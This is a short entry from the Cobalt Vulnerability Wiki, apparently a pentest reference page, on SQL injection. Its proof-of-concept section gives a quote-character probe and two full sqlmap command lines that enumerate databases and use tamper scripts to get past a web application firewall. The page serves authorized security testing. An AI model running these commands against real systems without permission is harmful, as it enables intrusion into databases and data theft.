Cobalt Crowdsourced Application PentestCobalt Crowdsourced Application PentestCobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V5 - Validation/Sanitization

SQL Injection

POC

Insert a single quote as payload ‘ to see the SQL error message Save the request in test.req file Send the file in sqlmap with a command similar to one of these: sqlmap -r test.req --dbms=mysql --level 3 --risk 3 --timeout 100 --flush-session --time-sec=2 --dbs --threads 10 -identify-waf

sqlmap -r test.req --dbms=mysql --level 3 --risk 3 --timeout 100 --flush-session --technique=B --time-sec=2 --dbs --threads 10 --tamper=between,informationschemacomment,bluecoat,charencode --drop-set-cookie --fresh-queries --binary-fields -identify-waf

Impact

High

Likelihood

High